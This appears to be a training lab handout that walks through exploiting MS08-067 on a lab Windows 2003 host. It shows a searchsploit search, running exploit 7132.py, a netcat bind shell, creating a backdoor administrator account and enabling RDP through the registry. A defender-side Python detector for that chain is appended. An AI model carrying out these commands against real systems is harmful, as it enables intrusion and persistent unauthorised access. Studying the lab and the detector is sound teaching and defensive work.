
Lab

Exploitation: system intrusion

System Intrusion

Software bug - Buffer Overflow - Windows 2003 OS - SP2

Searching for exploits offline


root@kali:~# cd /usr/share/exploitdb/
root@kali: /usr/share/exploitdb/# ls
files.csv platforms searchsploit
root@kali:/usr/share/exploitdb# ./searchsploit ms08
Description Path
--------------------------------------------------------------------------- -------------------------
Microsoft Office .WPS File Stack Overflow Exploit (MS08-011) /windows/local/5107.c
Microsoft Office Excel Code Execution Exploit (MS08-014) /windows/local/5287.txt
Microsoft Office XP SP3 PPT File Buffer Overflow Exploit (ms08-016) /windows/local/5320.txt
MS Windows GDI Image Parsing Stack Overflow Exploit (MS08-021) /windows/local/5442.cpp
MS Windows XP SP2 (win32k.sys) Privilege Escalation Exploit (MS08-025) /windows/local/5518.txt
Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053) /windows/remote/6454.html
MS Internet Explorer GDI+ Proof of Concept (MS08-052) /windows/dos/6619.html
MS Windows GDI (EMR_COLORMATCHTOTARGETW) Exploit MS08-021 /windows/remote/6656.txt
MS Windows GDI+ Proof of Concept (MS08-052) #2 /windows/dos/6716.pl
MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046) /windows/dos/6732.txt
MS Windows Server Service Code Execution PoC (MS08-067) /windows/dos/6824.txt
MS Windows Server Service Code Execution Exploit (MS08-067) (Univ) /windows/remote/6841.txt
MS Windows Server Service Code Execution Exploit (MS08-067) /windows/remote/7104.c
SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068) /windows/remote/7125.txt
MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3) /windows/remote/7132.py
Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069 /windows/remote/7196.html
root@kali:/usr/share/exploitdb#

Copy the exploit to /root and check that it works


root@kali:/usr/share/exploitdb# locate 7132.py
/usr/share/exploitdb/platforms/php/webapps/17132.py
/usr/share/exploitdb/platforms/windows/remote/7132.py
root@kali:/usr/share/exploitdb# cp /usr/share/exploitdb/platforms/windows/remote/7132.py /root/lab_exploit/
root@kali:/usr/share/exploitdb# cd /root/lab_exploit/

Solution Consultoria e Treinamento


www.solution-rj.com.br
Rua da Assembleia, n° 93, sala 1607, Centro – Rio de Janeiro/RJ.
Email: solution@solution-rj.com.br/Tel: 55 (21) 3179-0081 / 96972-4755 / 98732-9993 1
root@kali:~/lab_exploit# ls
7132.py
root@kali:/usr/share/exploitdb# more 7132.py

Let's try to run it (we have to pass the victim's IP and the target number: "1" for Windows 2000 and "2" for Windows 2003 SP2). Target WinXamp - 172.16.50.40
root@kali:~/lab_exploit# ./7132.py 172.16.50.40 2
####################################################################
###
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
####################################################################
###

[-]Windows 2003[SP2] payload loaded


[-]Initiating connection
[-]connected to ncacn_np:172.16.50.10[\pipe\browser]
[-]Exploit sent to target successfully...
[1]Telnet to port 4444 on target machine...
root@kali:~/lab_exploit# nc -nv 172.16.50.40 4444
(UNKNOWN) [172.16.50.40] 4444 (?) open
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection 2:

Connection-specific DNS Suffix . :


IP Address. . . . . . . . . . . . : 172.16.50.40
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.50.100

C:\WINDOWS\system32>

And now? To continue we need to know the command line, the Windows registry, and so on.
C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator ASPNET bob
Guest SUPPORT_388945a0
The command completed with one or more errors.

C:\WINDOWS\system32>

Using NMAP - check that RDP is stopped


root@kali:~# nmap -p 3389 172.16.50.40

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-07-02 19:33 BRT


Nmap scan report for 172.16.50.40
Host is up (0.00042s latency).
PORT STATE SERVICE
3389/tcp closed ms-term-serv

Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds


root@kali:~#

Creating a user and adding it to the administrators group


C:\WINDOWS\system32>net user hacker hacker /add
net user hacker hacker /add
The command completed successfully.
C:\WINDOWS\system32>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.
C:\WINDOWS\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator ASPNET bob
Guest hacker SUPPORT_388945a0

The command completed with one or more errors.
C:\WINDOWS\system32>

Checking that the user is in the Administrators group


C:\WINDOWS\system32>net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
hacker
The command completed successfully.
C:\WINDOWS\system32>

Enabling remote access via RDP


reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
C:\WINDOWS\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
Value fDenyTSConnections exists, overwrite(Yes/No)? yes
The operation completed successfully.

Checking again with NMAP and connecting


root@kali:~# nmap -p 3389 172.16.50.40
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-07-02 19:53 BRT
Nmap scan report for 172.16.50.10
Host is up (0.00058s latency).
PORT STATE SERVICE
3389/tcp open ms-term-serv
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
root@kali:~#

Connecting via RDP
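Seen from the defender's side, every step of this lab after the shell opens leaves a trace in the Windows Security log (4720 account created, 4732 member added to a local group) and, with Sysmon, in event 13 (registry value set). The detector below is an added example and not part of the lab handout; it runs over constructed, simplified event records (the field names are an assumption, not the real log schema) and flags the account-creation, admin-group, fDenyTSConnections=0 chain on one host.

```python
# Added example (not from the lab handout): detector for the post-exploitation
# chain this lab performs on the Windows 2003 host, written from the defender's
# side. Event records are CONSTRUCTED and simplified; field names are assumed.
from collections import defaultdict

SYSTEM = "NT AUTHORITY\\SYSTEM"
RDP_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"

# Constructed sample events: id = Windows event ID (13 = Sysmon registry set).
SAMPLE_EVENTS = [
    {"host": "WINXAMP", "id": 4720, "subject": SYSTEM, "target": "hacker", "detail": ""},
    {"host": "WINXAMP", "id": 4732, "subject": SYSTEM, "target": "hacker", "detail": "Administrators"},
    {"host": "WINXAMP", "id": 13, "subject": SYSTEM, "target": RDP_KEY, "detail": "DWORD (0x00000000)"},
    {"host": "FILESRV", "id": 4720, "subject": "CORP\\helpdesk", "target": "jsmith", "detail": ""},
    {"host": "FILESRV", "id": 13, "subject": "CORP\\admin", "target": RDP_KEY, "detail": "DWORD (0x00000001)"},
]

FULL_CHAIN = {"account_created_by_system", "added_to_local_admins", "rdp_enabled_via_registry"}


def classify(ev):
    """Map one event to a stage of the lab's chain, or None if it looks benign."""
    if ev["id"] == 4720 and ev["subject"] == SYSTEM:
        return "account_created_by_system"   # `net user X Y /add` run from a SYSTEM shell
    if ev["id"] == 4732 and ev["detail"].lower() == "administrators":
        return "added_to_local_admins"       # `net localgroup administrators X /add`
    if (ev["id"] == 13 and ev["target"].lower() == RDP_KEY.lower()
            and ev["detail"].endswith("(0x00000000)")):
        return "rdp_enabled_via_registry"    # fDenyTSConnections set to 0 (RDP turned on)
    return None


def detect(events):
    """Group matched stages per host; full_chain is True when all three are present."""
    stages = defaultdict(list)
    for ev in events:
        stage = classify(ev)
        if stage:
            stages[ev["host"]].append(stage)
    return {h: {"stages": s, "full_chain": FULL_CHAIN.issubset(s)} for h, s in stages.items()}


if __name__ == "__main__":
    for host, r in detect(SAMPLE_EVENTS).items():
        print(host, "FULL CHAIN" if r["full_chain"] else "partial", r["stages"])
```

A single stage (for example an administrator legitimately enabling RDP) is only a weak signal; the three stages on one host, all performed by SYSTEM, are what distinguishes this lab's activity.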
